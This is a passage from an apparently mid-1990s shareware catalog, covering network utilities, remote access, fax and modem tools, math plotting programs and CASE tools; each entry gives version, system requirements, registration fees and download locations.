monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XFORUM4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 5494 + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + BBS-like system for networks features 99 different message + forums with unlimited messages per forum, user access per + forum, user manage access per forum, message read/create/reply, + text import/export, clipboard cut/paste, online help, multi- + level security, and built-in x-FORUM4 administration. Low-cost, + easy-to-use, and simple-to-manage. Network-aware of both Novell + NetWare(R) and Banyan VINES(R). + + Chapter 10, "Communications" 367 + + + + Product: x-OUT3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.44 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XOUT3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1126 + PsL#: 10889 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Allows dynamic tracking of office in/out status of users with + default comment/contact information, alternate access, refresh + options, online help, and x-OUT3 administration. Easy-to-use + and network-aware of both Banyan VINES(R) and Novell + NetWare(R). + + + Product: x-OUT4 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.31 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XOUT4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4281 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Features in, out, and in-but-unavailable status, login versus + display names, alternate user access, color-status icons when + minimized, display sorts, online help, multi-level security, + display update, import options, and built-in x-OUT4 + administration. Low-cost, easy-to-use, and simple-to-manage. + Network-aware of both Novell NetWare(R) and Banyan VINES(R). + + Chapter 10, "Communications" 368 + + + + Product: x-SKED3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.58 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XSKED3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1127 + PsL#: 10890 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Features custom-defined room and resource definition prompts, + summary/detail/weekly calendars, event scheduler, TSR mode, + online help, and x-SKED3 administration. Easy-to-use and + network-aware of both Banyan VINES(R) and Novell NetWare(R). + + + 10.4.1 Modem-based networks + + See also: Communications, Remote computer access. + + Product: Link + Connects program to callback service. See full description on + page 355. + + Product: WinNET Mail for MS Windows + Internet/Usenet access. See full description on page 357. + + 10.4.2 Network utilities + + Product: ES-NMB + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.25 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; EGA monitor; Hard + disk. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + + Chapter 10, "Communications" 369 + + + + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; ESNMB.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1729 + PsL#: 11067 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Features display of news and bulletins in graphics mode at user + login. Includes 36 different font sizes/types, selectable color + and shade, PCX/GIF view, and complete NMBA administration + system. + + + Product: File_Handle Filer/Finder/Shell + Integrated DOS stereo file & program manager. See full + description on page 154. + + Product: Hands On Remote Control/Access + Full featured remote support. See full description on + page 372. + + Product: Jokes & Quotes + Author: Michael L. Wester, 919-552-0767 + Version: 1.4 (02-12-94) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 + Registration benefits: printed manual; 3 months of unlimited + phone, CompuServe, mail support; LAN license; bonus data; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; JQ14.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 73307,3547 for + assistance). + Download size: 333k (about 25 minutes with a 2400 baud modem) + Description: + Network ready or standalone, daily message display system. + Nearly 4000 jokes, quotes, stories, maxims, axioms, platitudes + & more can be selected from 25 "on screen" categories. Options + to print to any port, random select quotes, screen blanker, + change colors, reset category to any record and more! Send + messages across the net to all or special messages to selected + users, limit number of quotes displayed, administrator controls + categories displayed & more. Full mouse support & context + sensitive help. + + Chapter 10, "Communications" 370 + + + + Product: LAN Menu + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 2.06 (01-01-96) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Strongly recommended: Hard disk; Network (LAN). + Registration fee: 29.00US$ (add 2.00US$ for shipping to U.S. + addresses) (add 3.00US$ for shipping to Canadian addresses) + (add 5.00US$ for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: LAN206.ZIP on BBSs (call 216-661-9065 to download it at + no charge); LAN206.ZIP on CompuServe in CIS:NOVUSER forum + LIBrary 7 (or contact userID 73057,3113 for assistance); + LAN206.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + A menu and security system for all DOS based networks. Has up + to 10,000 menu entries that can run any programs, commands, or + batch files across the network. Includes password protection. + + + Product: NeMenu + Author: Just-In-Time Computing Services (John C. Skurka), + 607-539-6609 + Version: 1.01 (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 325k RAM; EGA monitor; Hard + disk; Network (LAN). DEC Pathworks(tm) Network. + Strongly recommended: Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, GEnie, mail + support; lifetime return policy; all ASP-wide offers (see + page 6). 2-month free upgrading allowed. + Look for: NEMENU10.ZIP on BBSs (call 607-533-7072 to download it + at no charge); NMENU1.EXE on CompuServe in CIS:DECPCI forum + LIBrary 10 (or contact userID 73020,3205 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + A PATHWORKS specific command menu that aids the network user in + connecting and disconnecting file and printer services and + gives the user access to print jobs, SETHOST and NETSETUP + commands through an attractive on-screen menu. Designed for + users not familiar with network command syntax. Features + include full mouse support, and a built-in screen blanker. Easy + installation and simplistic use, as well as an attractive on- + screen display make it a nice alternative to the USE command. + + Chapter 10, "Communications" 371 + + + + Product: Notice Board + Author: Cornerstone Software Limited (Chris Tyler), + 01044-61-904-8143 + Version: 2.2 (03-07-94) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $95.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; LAN license; all ASP-wide offers (see page 6); + discounts on other products. + Look for: NB22.ZIP on BBSs (call 718-837-3236 to download it at + no charge); NB22.EXE on CompuServe in CIS:NOVUSER forum LIBrary + 8 (or contact userID 71461,556 for assistance). + SWREG#: 1570 + PsL#: 11044 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Provides all of the facilities of an office notice board on the + PCs attached to your network, and a menu system (without memory + overhead), rolled into one. As well as key notices, which + appear automatically whenever the package is run, it has a + simple-to-use menu structure allowing users to browse through a + potentially huge database of further information. In use in + the USA, Canada, Europe and Australia by everyone from + government agencies to schools. + + + Product: x-NEWS3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.57 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XNEWS3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1125 + PsL#: 10888 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Allows posting of bulletins and announcements at user login, + including automatic tracking of displayed notices per user, + configurable display intervals, and imbedded color text command + macros. Easy-to-use and network-aware of both Banyan VINES(R) + and Novell NetWare(R). + + Chapter 10, "Communications" 372 + + + + 10.5 Remote computer access + + See also: Communications, Networks, Modem-based networks. + + Product: Hands On Remote Control/Access + Author: P. C. Softsmith (Vic Williams), 604-433-5189 + Version: 5.5 (08-29-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hayes-compatible modem. + Registration fee: $50.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; all + ASP-wide offers (see page 6); registration commissions. 1 free + update disk(s) sent out. + Look for: HANDSON.ZIP on BBSs; HANDSON.ZIP on CompuServe in + CIS:PCCOM forum LIBrary 3 (or contact userID 75020,2664 for + assistance). + SWREG#: 4509 + Download size: 750k (about 56 minutes with a 2400 baud modem) + Description: + Full featured DOS remote support, access, or control. Its + modular design encourages use in a wide range of situations, + including very small ram availability. Has wide selection of + options and can be customised to fit local needs. Includes 465 + modem setup strings. Many internal revisions, including + changes to help it run under OS/2 and the Windows variants up + to WIN95. + + + 10.6 Fax machines & fax cards + + Product: FAXHAVEN + Author: HTF Consulting (H. Thomas FONES), 510-521-1689 + Version: 1.0 (10-01-94) + Needs: IBM PC, DOS 1.0 or better. 640k RAM; Hercules monitor; + Hard disk; Hayes-compatible modem. faxmodem with software + (BITFAX, QUICK-LINK, Frecom, Complete PC). + Registration fee: $39.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 4 months of phone, + fax, CompuServe, mail support; bonus utilities; bonus data; all + ASP-wide offers (see page 6); discounts on other products. + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + Access for processing of received FAXes. View, print, convert + to other graphic, archive, delete. DOS-based, Funxn-Key driven. + Parks disk drive heads. Alerts user to received FAxes. + + Chapter 10, "Communications" 373 + + + + Product: FaxMail for Windows + Author: ElectraSoft, 713-261-0307 + Version: v5.02 (12-31-95) + Needs: IBM 80386, Windows for Workgroups 3.1 or better. CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Hayes-compatible modem; + Mouse; Plotter; Epson printer; EMS memory; XMS memory. + Strongly recommended: VGA monitor. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, BBS, CompuServe support; + royalty-free runtime license; LAN license; site license; bonus + utilities; bonus data; bonus graphics; bonus templates; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades; registration commissions. + Look for: FAX_V502.ZIP on BBSs (call 713-499-5939 to download it + at no charge); FAXWIN.ZIP on CompuServe in CIS:GO PCFF forum + LIBrary 0 (multiple files) (or contact userID 74464,763 for + assistance). + SWREG#: 4390 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + Adds a button to Windows programs giving you access to + all the fax machines in the world making them become your + printers. Before printing to a fax machine or upon receiving a + fax, use the optional zoom/edit to add graphic, text, or sign + the fax with your mouse. FaxMail has hundreds of useful + features available such as OCR, Fax to PCX BreakUp. + + + Product: HQ-FAX (1-Step High Quality FAX + Author: HTF Consulting (H. Thomas FONES), 510-521-1689 + Version: 2.0 (09-30-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $29.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 4 months of + unlimited phone, CompuServe, mail support; bonus data; bonus + fonts; bonus graphics; discounts on other products; discounts + on upgrades. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + DOS-based, Funxn-Key driven. Converts and sends documents in 1 + step. uses Epson LQ print files as input. Produces a variety of + output formats. Works with FAX modem products; BITFAX, + QUICKLINK, FRECOM, Complete PC. Many value-adding features for + your FAX modem. Variety of fonts & type-sizes. Integrated + graphics, custom forms. + + Chapter 10, "Communications" 374 + + + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 356. + + Product: wfStatus + Changes WinFax icon to show receive status. See full + description on page 357. + + + 10.7 Voice mail systems + + Product: Folders + Personal information manager network email. See full + description on page 138. + + Product: Link + Connects program to callback service. See full description on + page 355. + + + 10.8 Call logging & analysis + + See also: Utilities, Desktop utilities, Phone dialers. + + Product: BBS Access Communications + BBS communications for uploading/downloading. See full + description on page 355. + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 127. + + 10.8.1 Phone bill analyzers + + See also: Business, Business finances, Billing/invoice systems. + + Product: Qanalyst + Author: Barn Owl Software, 618-632-7345 + Version: 2.05 (09-19-90) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. Qmodem v3.0 or better. + Registration fee: $22.50 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 51/4" master disk(s); 12 + months of unlimited phone, fax, CompuServe, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + + Chapter 10, "Communications" 375 + + + + page 6); discounts on other products. Lifetime free upgrading + allowed. + Look for: QANA-205.ZIP on BBSs; QANLYS.ZIP on CompuServe in + CIS:PCCOM forum LIBrary 2 (or contact userID 74017,1344 for + assistance); QANA-205.ZIP on GEnie in QMODEM forum LIBrary 1 + (or contact userID R.ROSENBERGE for assistance). + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + Analyzes Qmodem log files so you know how much you SPEND on + modem calls. Great for CompuServe & GEnie users! Keeps track + of holidays when rates go down. Analyzes uploads & downloads + too, including the cost to transfer files. Powerful + maintenance facility keeps Qmodem log files as small as + possible. Uses Call Data Standard phone-rate files. + + + 10.9 File transfer protocols + + Product: BBS Access Communications + BBS communications for uploading/downloading. See full + description on page 355. + + Product: Hands On Remote Control/Access + Full featured remote support. See full description on + page 372. + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 34. + + + 10.10 Communication utilities + + Product: BBS Access Communications + BBS communications for uploading/downloading. See full + description on page 355. + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 71. + + Product: DBKIT + Xbase programming & maintenance. See full description on + page 235. + + Product: FSLOGIN [***] + Full screen login program for Novell networks. See full + description on page 380. + + Product: Hands On Remote Control/Access + Full featured remote support. See full description on + page 372. + + Chapter 10, "Communications" 376 + + + + Product: ModemSta + Author: TeddyWare (Ted Johansson) + Version: 1.9 (04-21-96) + Needs: IBM 80386, Windows 3.1 or better. + Strongly recommended: Modem. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: lifetime unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: MODSTA19.ZIP on BBSs; MODSTA19.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 3 (or contact userID 100257,2662 for + assistance). + SWREG#: 4609 + PsL#: 11819 + Download size: 314k (about 24 minutes with a 2400 baud modem) + Description: + Helps you operate the modem by showing a small animated icon + replica or indicator display of a typical modem's front panel. + Several great 3D looks, with customizable colors. And: modem + initialization, logging of incoming calls and connections, + additional status info, show communications info, generation of + sounds at events such as Ring Indication and Line Connection + events. Show connect string, dial number, # transmitted bytes. + Can also be used to monitor parallel ports. Win95 compatible. + + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 103. + + Product: WinNET Mail for MS Windows + Internet/Usenet access. See full description on page 357. + + Product: XferPro [***] + Author: Sabasoft, Inc. + Version: 1.1.1 (06-12-96) + Needs: IBM 80386, Windows 3.1 or better. 100k RAM. + Registration fee: $16.95 (add $1.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; XFERP111.ZIP on + CompuServe in CIS:INETRES forum LIBrary 4. + Download size: 144k (about eleven minutes with a 2400 baud modem) + Description: + XferPro, short for Information Transfer Professional, allows + users to send text, application data, messages, images, audio, + video, executable files and other information types via + electronic mail or Usenet newsgroups. All popular encoding + methods are supported, including Multipurpose Internet Mail + Extension (MIME) 1.0, UU, XX, and Binhex 4.0. XferPro was + + Chapter 10, "Communications" 377 + + + + exclusively designed to make decoding simple by automatically + determining how to decode and accepting multiple part files in + any order. + + + 10.11 Software tools & add-ins + + 10.11.1 For multiple programs + + Product: Hands On Remote Control/Access + Full featured remote support. See full description on + page 372. + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 356. + + Product: wfStatus + Changes WinFax icon to show receive status. See full + description on page 357. + + 10.11.2 For TAPCIS + + Product: Recon + Full management of CompuServe message files. See full + description on page 358. + + 10.11.3 For PCBoard + + Product: Medieval War Door + BBS door game for medieval war/strategy. See full description + on page 361. + + 10.11.4 For Qmodem + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 374. + + 10.11.5 For OzCIS + + Product: Recon + Full management of CompuServe message files. See full + description on page 358. + + 10.11.6 For other + + Product: Recon + Full management of CompuServe message files. See full + description on page 358. + + Chapter 10, "Communications" 378 + + + + Product: Tag Line Xpress + Author: Ron Janorkar, 212-334-1243 + Version: 4.00 (05-20-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Hard disk. QWK mail + reader software. + Strongly recommended: CGA monitor. + Registration fee: $20.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support; disks of other shareware. Lifetime free upgrading + allowed. + Look for: TAGLX400.ZIP on BBSs (call 718-716-6198 to download it + at no charge). + Download size: 215k (about 16 minutes with a 2400 baud modem) + Description: + Enhanced tagline manager for offline mail readers. Offers + unlimited taglines, installs automatically into several + readers, has a built in quoter and signature manager, steal + every tagline from QWK and Blue Wave mail packets, even + suggests taglines based on the subject and message content. + + + 10.12 Other + + Product: Baseball Hotline Information + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 2.0 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $0.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, fax, CompuServe, mail + support; LAN license; site license; bonus data; all ASP-wide + offers (see page 6). + Look for: BASEBL20.ZIP on BBSs (call 573-774-5907 to download it + at no charge); BASEBALL.ZIP on CompuServe in CIS:SPORTS forum + LIBrary 0 (or contact userID 71373,572 for assistance). + Download size: 114k (about nine minutes with a 2400 baud modem) + Description: + Information about how to reach your favorite baseball team. + Directly connect to the front office (or get the Commissioner + of Baseball) with a single auto-georouted call. System uses + special software to automatically route call to the team in the + area from which you are calling. Program (windows help file) + also includes information about how to find Baseball + information on the Internet. + + Chapter 10, "Communications" 379 + + + + Product: Congressional Hotline Info + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 2.0 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $0.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, fax, CompuServe, mail + support; LAN license; site license; bonus data; all ASP-wide + offers (see page 6). + Look for: CONGRS20.ZIP on BBSs (call 573-774-5907 to download it + at no charge); CONGRESS.ZIP on CompuServe in CIS:DEMOCRAT forum + LIBrary 0 (or contact userID 71373,572 for assistance). + Download size: 114k (about nine minutes with a 2400 baud modem) + Description: + Info about how to reach your US Senator or US Representative. + Directly connect to their office with a single auto-georouted + call. System uses special software to automatically route call + to the person representing the area from which you are calling. + Program (windows help file) also includes information about how + to reach your US Senator or US Representative on the Internet. + Shows how to get direct e-mail addresses for all US Senators. + + + Product: FSLOGIN [***] + Author: Confirm + Version: 2.22 (07-22-96) + Needs: IBM PC, DOS 3.3 or better. 400k RAM; Network (LAN). + Novell NetWare 2.15 - 4.01. + Registration fee: $129.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of fax, CompuServe, mail support; LAN license. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs; FSL222.ZIP on CompuServe + in CIS:NOVUSER forum LIBrary 0 (or contact userID 100334,572 + for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + All users hooked to a Novell network have at least one thing in + common: they must login to gain access to applications & data. + This program enhances the way you login to a server by + providing a full-screen Novell style menu. It does extensive + checking of accounting and security exceptions before actually + logging in. Supports NetWare Directory services as well as + bindery bases servers. + + Chapter 10, "Communications" 380 + + + + Product: Teleshare/DOS Remote Access + Author: P. C. Softsmith (Vic Williams), 604-433-5189 + Version: 3 (06-01-95) + Needs: IBM PC, DOS 3.0 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Modem. + Registration fee: $35.00 + Registration benefits: Full program functionality; 3 months of + unlimited CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 6); registration commissions. 1 free + update disk(s) sent out. + Look for: TS3*.ZIP on BBSs; TS3*.ZIP on CompuServe in CIS:PCCOM + forum LIBrary 3 (or contact userID 75020,2664 for assistance). + SWREG#: 4510 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Good basic remote support and access to 115200 baud. Has small + RAM presence and snappy screen updates, enabling its use in + workplace settings avoided by others. Minimally intrusive and + easily customized to fit your needs. Can be installed as an + add-in (eg to telix), and or with your software package. + + Chapter 11, "Mathematics" 381 + + + + + + Chapter 11 + Mathematics + + See also: Utilities, Desktop utilities, Calculators; Education, + Math. + + + 11.1 General math + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 599. + + Product: MathWiz + Financial analyzer/calculator. See full description on + page 339. + + Product: MERLIN'S MATH + Game teaches multiplication & long division. See full + description on page 435. + + Product: Mouse Math + A whimsical verbal math drill program. See full description on + page 459. + + Product: XYSee + Author: Insight Advantage, 817-346-9116 + Version: 4.0a (09-04-94) + Needs: IBM AT (80286), DOS 2.1 or better. 384k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; VGA monitor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; CD-ROM drive. + Registration fee: $30.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of CompuServe, + mail support; bonus utilities; bonus data; bonus templates; all + ASP-wide offers (see page 6). 12-month free upgrading allowed. + 1 free update disk(s) sent out. + Look for: XYSEE4.ZIP on BBSs; XYSEE4.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 73627,3532 for + assistance). + SWREG#: 3309 + PsL#: 10176 + Download size: 189k (about 14 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + Middle/High school & College visual math for Windows & DOS. + Highly interactive, visually oriented, Algebra, Geometry & + Trigonometry supplement. Covers SAT, ACT, & Math Placement + Material from points to parametrics. Sensational 3-D interface + + Chapter 11, "Mathematics" 382 + + + + with colorful icons, button bars, & in-cell editing. Includes + comprehensive Tutorial, Multi-level feature help & printable + performance reports. Auto-installs, and starts from Windows + icon or DOS prompt. + + + 11.2 Function & curve plotting + + Product: FDplot + Author: Abri Technologies, Inc. + Version: 1.3 (07-12-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM; CGA monitor. + GWBASIC or QBASIC. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, CompuServe, mail + support; royalty-free source code; discounts on upgrades; + registration commissions. + Look for: availability unknown on BBSs; FDPLOT.EXE on CompuServe + in CIS:SCIENCE forum LIBrary 8 (or contact userID 72345,1623 + for assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + A data and scientific function plotting package intended for + upper high-school or college students and instructors. It is + menu driven, fast and less fuss to use than most graphics + calculators. + + + Product: PLOTTER + Author: Robert Lindsay Wells, 813-447-0604 + Version: 7.7 (01-17-96) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; math coprocessor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $19.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, newsletter, mail support; 3-month limited return + policy; bonus utilities. 1 free update disk(s) sent out. + Look for: PLOTR77.ZIP on BBSs; PLOTR.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 13 (or contact userID 102507,3113 for + assistance). + SWREG#: 9183 + Download size: 193k (about 15 minutes with a 2400 baud modem) + Description: + A DOS program for data plotting and analysis. Includes a full + screen data editor, curve fitting, fast Fourier transforms and + digital filtering. Features include flexible plot labelling, + + Chapter 11, "Mathematics" 383 + + + + data value cursor, printer hard copy and PCX screen output. + Uses ASCII data files. Ideal for graphing and analyzing data + from lab experiments, computer simulations and data acquisition + systems. Comes with on-line instructions. Mouse supported. + + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 381. + + + 11.3 Mathematical utilities + + Product: Convert It!(tm) SE + Versatile unit of measure converter. See full description on + page 317. + + Product: Money Math for Windows + Financial analysis mathematical tools. See full description on + page 250. + + Chapter 12, "Computer programming" 384 + + + + + + Chapter 12 + Computer programming + + + 12.1 CASE tools + + Product: Assistant For Windows + Author: Thomas Koch, 0049897602709 + Version: 1.0 (11-14-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk. + Strongly recommended: VGA monitor; Mouse; XMS memory. + Registration fee: $30.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support. 1 free update disk(s) sent + out. + Look for: availability unknown on BBSs; ASSIST.ZIP on CompuServe + in CIS:DEUSHARE forum LIBrary 13 (or contact userID 100610,1742 + for assistance). + PsL#: 14701 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + How many times have you worked on UNIX command level to find a + certain file? On your PC you are looking for a file, that + contains some specific data. In both cases you have your + manuals and some slips of paper where you have noted hotline + numbers. + + This utility enables you to build the commands you need without + being concerned with its syntax. Once you have informed + Assistant For Windows about that command, this product will + guide you menu driven through the syntax. + + + Product: CodePrint for C/C++ + C/C++ source code formatter and printer. See full description + on page 404. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 481. + + Product: Playground + Author: Object International, Inc. + Version: 1.0a (01-04-95) + Needs: IBM 80386, Windows 3.1 or better. 8196k RAM; VGA monitor; + Mouse. Win32s. + Registration fee: $40.00 + Registration benefits: 31/2" master disk(s); 24 months of unlimited + fax, CompuServe, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on + + Chapter 12, "Computer programming" 385 + + + + upgrades. 3-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; PLAYGR.EXE on CompuServe + in CIS:CASE forum LIBrary 2 (or contact userID 71210,3642 for + assistance). + SWREG#: 5751 + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + Especially suited for teams of domain experts and object + modelers, working together during the early stages of a new + project. It's a great way to get started with building + effective object models. Features: drag-and-drop classes, + attributes, services, connections; multiple views; view + management, with view categories, selective hiding/showing; + 